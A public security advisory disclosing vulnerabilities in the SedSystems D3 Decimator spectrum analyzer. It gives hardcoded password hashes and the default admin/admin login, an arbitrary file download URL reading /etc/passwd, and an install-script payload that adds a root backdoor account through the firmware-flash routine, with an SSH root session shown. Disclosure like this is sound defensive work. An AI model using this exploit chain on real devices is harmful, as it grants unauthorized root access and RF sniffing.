SedSystems D3 Decimator Default Credentials / File Disclosure

2017-04-14T00:00:00
ID PACKETSTORM:142133
Type packetstorm
Reporter prdelka
Modified 2017-04-14T00:00:00

Description

                                        
                                            `SedSystems D3 Decimator Multiple Vulnerabilities  
================================================  
Identification of the vulnerable device can be performed by scanning for   
TCP port 9784 which offers a default remote API. When connected to this   
device it will announce itself with "connected" or similar:  
  
Connected to x.x.x.x.  
Escape character is '^]'.  
connected  
status  
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0  
ping  
ping:ok  
  
The web service by default has a user interface for accessing the RF   
spectrum analyzer capability. The device itself from the API can give   
raw remote access to I/Q samples so can be used to remotely sniff the   
RF spectrum. The Web Configuration Manager can be found on   
"/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.  
  
Hardcoded credentials can be found in the /etc/passwd files contained   
within the default firmware since at least February 2013. The following   
entries can be found:  
  
root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly  
  
The admin user has a default password of "admin", at this time the root   
user password is unknown however there is no documented way of changing   
this trivially in a device. Using the "admin" user you can obtain a web   
session to the wcm.cgi and exploit a hidden arbitary file download   
vulnerability discovered by reverse engineering the firmware:  
  
http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd  
  
This will allow you to download any file and as the "admin" user has root  
privileges you can obtain access to any file on the device. To execute   
arbitary code you can make use of a vulnerbaility within the firmware   
flash routines. By uploading a crafted tarball that contains a "install"   
script in its root, the device will accept your firmware and then attempt  
to execute ./install if found as root, you can then cancel the "flash"   
process to prevent bricking/modifcation of the device. The problem is due  
to /usr/bin/install_flash which after using "tar" to unpack an archive   
to a tmp folder of /tmp/PID_of_tar does the following:  
  
80 # If the archive contained its own install script then use that  
81   
82 if [ -x ./install ]; then  
83 ./install $all_args  
84 rc=$?  
85 exit $rc  
86 fi  
87   
  
Using this vulnerability you can upload a .tar file containing an install  
file that looks like the following to obtain a root user account with   
adm1n/admin.  
  
cat install   
#!/bin/sh  
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd  
  
You can then SSH remotely to the device as PermitRootLogin is enabled   
by default.  
  
E.g.  
  
$ ssh -l adm1n x.x.x.x  
adm1n@x.x.x.x's password: admin   
# uname -a  
Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux  
# cat /proc/cpuinfo  
Processor : ARM926EJ-S rev 4 (v5l)  
BogoMIPS : 103.83  
Features : swp half thumb fastmult vfp edsp java   
CPU implementer : 0x41  
CPU architecture: 5TEJ  
CPU variant : 0x0  
CPU part : 0x926  
CPU revision : 4  
  
Hardware : SED 32XX Based CCA  
Revision : 0000  
Serial : 0000000000000000  
#   
  
Vendor website can be found at the following url:  
* http://www.sedsystems.ca/decimator_spectrum_analyzer  
  
-- prdelka  
  
`